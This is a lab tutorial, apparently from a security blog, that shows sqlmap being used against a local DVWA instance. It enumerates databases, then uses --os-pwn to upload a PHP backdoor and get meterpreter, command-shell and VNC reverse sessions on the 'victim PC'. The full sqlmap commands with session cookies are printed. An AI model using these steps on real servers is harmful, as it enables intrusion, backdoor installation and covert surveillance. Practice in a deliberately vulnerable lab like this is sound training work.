This article is about how to use sqlmap for SQL injection to hack victim pc and gain shell access. Here I had performed SQL attack to gain three different types of the shell (meterpreter, command shell and VNC )

Requirement:

• Xampp/Wamp Server                                                                                                           
• DVWA Lab
• Kali Linux: Burp suite, sqlmap tool 

Very first you need to install DVWA lab in your XAMPP or WAMP server, read full article from here

Logging into DVWA and Setting Security Level

Now open the DVWA in your pc and login with following credentials:

Username – admin

Password – password

Click on DVWA Security and set Website Security Level low

From the list of vulnerabilities select SQL Injection for your attack. Type user ID: 1 in text box.  Don’t click on submit button without setting browser proxy. Set your browser proxy to make burp suite work properly.

Capturing Request and Extracting Cookies

Let’s start out SQLMap to Metasploit OS exploitation.

Turn on burp suite click on the proxy in the menu bar and go for intercept is on the button. Come back and click on submit button in dvwa. Burp suit will provide” cookie” and “referrer” under fetched data which will be used later in sqlmap commands.

Let’s enumerate all databases name using “referrer and cookies” under sqlmap command.

sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" --dbs

It has dumped all names of the database. Now I am going to choose dvwa to access its back-end database management system.

Now type the following command to access shell of the web server and follow the screenshot.

sqlmap -u "http://192.168.1.79:81/dvwa/vulnerabilities/sqli/?id=1&submit=submit" --cookie="security=low; PHPSESSID=jgs556oh1j1n8pc1ea0ovmeed47" -D dvwa --os-pwn

Choosing Payload and Uploading Backdoor

Type 1 for Metasploit framework to establish a reverse connection then type 4 for php payload for supporting server and again type 1 for the common location for the writable directory to upload payload as a backdoor in victim PC.

Here Type 1 for reverse tcp connection as the default option. Now I will choose these entire three payloads one by one and try to hack web server every time. Now type 1 for meterpreter.

Shell 1: Meterpreter Session

It will load the Metasploit framework and provides meterpreter session 1.

Shell 2: Command Shell Session

Repeat the whole process till reverse tcp connection when further it asks to choose payload, then type 2 for the shell.

Then it will load the Metasploit framework and provides command shell session 1.

Shell 3: VNC Viewer Access

Repeat the whole process till reverse tcp connection when further it asks to choose payload, this time now type 3 for VNC.

Again it will load the Metasploit framework and launching viewer.

Finally, you can see from the given screenshot that I had access victim pc through TightVNC and now victims each moment will be kept under my observation. Hence, we have hacked victim pc three times with various type shell.

Finally we have completed the SQLMap to Metasploit OS exploitation.

To learn more about Database Hacking. Follow this Link.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here